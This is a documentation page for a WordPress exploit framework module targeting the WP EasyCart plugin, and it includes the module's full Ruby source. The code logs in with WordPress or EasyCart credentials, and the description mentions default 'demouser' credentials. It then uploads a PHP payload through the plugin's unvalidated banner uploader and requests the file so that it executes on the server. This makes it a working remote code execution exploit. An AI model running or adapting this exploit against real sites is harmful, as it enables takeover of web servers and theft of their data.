Class: Wpxf::Exploit::EasyCartShellUpload
- Includes:
- Wpxf, Net::HttpClient, WordPress::Login
- Defined in:
- lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb
Constant Summary
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary
- #check ⇒ Object
- #ec_password ⇒ Object
- #ec_password_is_hash ⇒ Object
-
#initialize ⇒ EasyCartShellUpload
constructor
A new instance of EasyCartShellUpload.
- #password ⇒ Object
- #payload_body_builder(date_hash, payload_name, include_req_id) ⇒ Object
- #plugin_url ⇒ Object
- #req_id ⇒ Object
- #run ⇒ Object
- #uploader_url ⇒ Object
- #use_ec_authentication ⇒ Object
- #use_wordpress_authentication ⇒ Object
- #username ⇒ Object
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
#authenticate_with_wordpress, #requires_authentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ EasyCartShellUpload
Returns a new instance of EasyCartShellUpload.
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 8
# Registers the module metadata and the credential options used by #run.
#
# The rendered listing drops the name of the call that registers the option
# array; +register_options+ (from the Options mixin) is used here.
#
# @return [EasyCartShellUpload] a new instance of EasyCartShellUpload
def initialize
  super

  description =
    'WordPress Shopping Cart (WP EasyCart) Plugin for WordPress '\
    'contains a flaw that allows a remote attacker to execute '\
    'arbitrary PHP code. This flaw exists because the '\
    '/inc/amfphp/administration/banneruploaderscript.php script does '\
    'not properly verify or sanitize user-uploaded files. By '\
    'uploading a .php file, the remote system will place the file in '\
    'a user-accessible path. Making a direct request to the uploaded '\
    'file will allow the attacker to execute the script with the '\
    'privileges of the web server.'\
    "\n"\
    'In versions <= 3.0.8 authentication can be done by using the '\
    'WordPress credentials of a user with any role. In later '\
    'versions, a valid EasyCart admin password will be required that '\
    'is in use by any admin user. A default installation of EasyCart '\
    'will setup a user called "demouser" with a preset password '\
    'of "demouser".'

  update_info(
    name: 'EasyCart Shell Upload',
    desc: description,
    author: [
      'Kacper Szurek', # Vulnerability disclosure
      'rastating'      # WPXF module
    ],
    references: [
      ['WPVDB', '7745']
    ],
    date: 'Jan 08 2015'
  )

  # Either the WordPress pair or ec_password must be set; #run enforces this.
  credential_options = [
    StringOption.new(
      name: 'username',
      desc: 'The WordPress username to authenticate with (versions <= 3.0.8)'
    ),
    StringOption.new(
      name: 'password',
      desc: 'The WordPress password to authenticate with (versions <= 3.0.8)'
    ),
    StringOption.new(
      name: 'ec_password',
      desc: 'The EasyCart password to authenticate with (versions <= 3.0.18)'
    ),
    BooleanOption.new(
      name: 'ec_password_is_hash',
      desc: 'Whether or not ec_password is an MD5 hash',
      default: false
    )
  ]

  register_options(credential_options)
end
Instance Method Details
#check ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 92
# Checks the installed plugin version against the plugin's readme.
#
# @return [Object] whatever +check_plugin_version_from_readme+ returns for the
#   'wp-easycart' slug and version '3.0.19' (presumably the first version
#   that is not affected; see that helper in WordPress::Fingerprint)
def check
  slug = 'wp-easycart'
  version = '3.0.19'
  check_plugin_version_from_readme(slug, version)
end
#ec_password ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 68
# The EasyCart password supplied via the +ec_password+ option.
#
# @return [Object] the normalized value of the +ec_password+ option
def ec_password
  option_name = 'ec_password'
  normalized_option_value(option_name)
end
#ec_password_is_hash ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 72
# Whether the +ec_password+ option already holds an MD5 hash rather than a
# clear-text password (a BooleanOption defaulting to false, see #initialize).
#
# @return [Object] the normalized value of the +ec_password_is_hash+ option
def ec_password_is_hash
  option_name = 'ec_password_is_hash'
  normalized_option_value(option_name)
end
#password ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 64
# The WordPress password supplied via the +password+ option.
#
# @return [Object] the normalized value of the +password+ option
def password
  option_name = 'password'
  normalized_option_value(option_name)
end
#payload_body_builder(date_hash, payload_name, include_req_id) ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 104
# Builds the multipart body for the upload request.
#
# @param date_hash [String] value sent in the +datemd5+ field
# @param payload_name [String] file name given to the +Filedata+ part
# @param include_req_id [Boolean] when truthy, a +reqID+ field carrying
#   #req_id is appended (the EasyCart-password path)
# @return [Utility::BodyBuilder] the populated builder; the caller invokes
#   +create+ on it to obtain the body
def payload_body_builder(date_hash, payload_name, include_req_id)
  Utility::BodyBuilder.new.tap do |form|
    form.add_field('datemd5', date_hash)
    form.add_file_from_string('Filedata', payload.encoded, payload_name)
    form.add_field('reqID', req_id) if include_req_id
  end
end
#plugin_url ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 96
# The URL of the wp-easycart plugin directory under the plugins URL.
#
# @return [Object] the result of +normalize_uri+ for the plugin directory
def plugin_url
  plugins_base = wordpress_url_plugins
  normalize_uri(plugins_base, 'wp-easycart')
end
#req_id ⇒ Object
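# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 84
# The value sent in the +reqID+ field: the EasyCart password as an MD5 hash.
#
# The original used explicit +return+s in both branches of an if/else; the
# value is now the method's last expression.
#
# @return [Object] #ec_password unchanged when #ec_password_is_hash is truthy,
#   otherwise +Utility::Text.md5+ of #ec_password
def req_id
  return ec_password if ec_password_is_hash

  Utility::Text.md5(ec_password)
end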
#run ⇒ Object
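# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 112
# Runs the module: authenticates (WordPress credentials first, then the
# EasyCart password when one is set), uploads the encoded payload to the
# banner uploader script and requests the uploaded file once.
#
# Fix: the upload error path previously called +res.code+ even when +res+ was
# nil (no response at all), raising NoMethodError instead of returning false.
#
# The rendered listing drops the name of the local that holds the WordPress
# login cookie; it is called +cookie+ here.
#
# @return [Boolean] false when the parent +run+ returns false, when neither
#   credential set is supplied, when WordPress login fails with no EasyCart
#   fallback, or when the upload request does not return 200; true otherwise
def run
  return false unless super

  if !use_wordpress_authentication && !use_ec_authentication
    emit_error 'You must set either the username and password options or '\
               'specify an ec_password value'
    return false
  end

  if use_wordpress_authentication && use_ec_authentication
    emit_info 'Both EasyCart and WordPress credentials were supplied, '\
              'attempting WordPress first...'
  end

  # Stays nil when WordPress authentication is not used; the upload request
  # is then sent without a cookie and relies on the reqID field instead.
  cookie = nil
  if use_wordpress_authentication
    # NOTE(review): this echoes the password in clear text to the output
    # stream (and any log capturing it); consider redacting it.
    emit_info "Authenticating using #{username}:#{password}..."
    cookie = wordpress_login(username, password)
    if cookie
      emit_success 'Authenticated with WordPress', true
    elsif use_ec_authentication
      emit_warning 'Failed to authenticate with WordPress, attempting '\
                   'upload with EC password next...'
    else
      emit_error 'Failed to authenticate with WordPress'
      return false
    end
  end

  emit_info 'Preparing payload...'
  payload_name = Utility::Text.rand_alpha(10)
  date_hash = Utility::Text.md5(Time.now.to_s)
  # The server is expected to store the file as <name>_<datemd5>.php under
  # products/banners; that is where the file is requested from below.
  uploaded_filename = "#{payload_name}_#{date_hash}.php"
  payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename)
  builder = payload_body_builder(
    date_hash,
    "#{payload_name}.php",
    use_ec_authentication
  )

  emit_info 'Uploading payload...'
  res = nil
  builder.create do |body|
    res = execute_post_request(url: uploader_url, body: body, cookie: cookie)
  end

  if res.nil? || res.code != 200
    emit_error 'Failed to upload payload'
    # Only report a status code when a response was actually received.
    emit_error "Server responded with code #{res.code}", true unless res.nil?
    return false
  end

  emit_info 'Executing the payload...'
  res = execute_get_request(url: payload_url)
  if res && res.code == 200 && !res.body.strip.empty?
    emit_success "Result: #{res.body}"
  end

  true
end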
#uploader_url ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 100
# The URL of the plugin's banner uploader script, the endpoint the module
# description identifies as not validating uploaded files.
#
# @return [Object] the result of +normalize_uri+ for
#   <plugin_url>/inc/amfphp/administration/banneruploaderscript.php
def uploader_url
  script_path = %w[inc amfphp administration banneruploaderscript.php]
  normalize_uri(plugin_url, *script_path)
end
#use_ec_authentication ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 80
# Whether an EasyCart password was supplied.
#
# @return [Boolean] true when #ec_password, as a string, is non-empty
def use_ec_authentication
  !ec_password.to_s.empty?
end
#use_wordpress_authentication ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 76
# Whether both WordPress credentials were supplied.
#
# @return [Boolean] true when #username and #password, as strings, are both
#   non-empty; #password is not read when #username is empty
def use_wordpress_authentication
  return false if username.to_s.empty?

  !password.to_s.empty?
end
#username ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb', line 60
# The WordPress username supplied via the +username+ option.
#
# @return [Object] the normalized value of the +username+ option
def username
  option_name = 'username'
  normalized_option_value(option_name)
end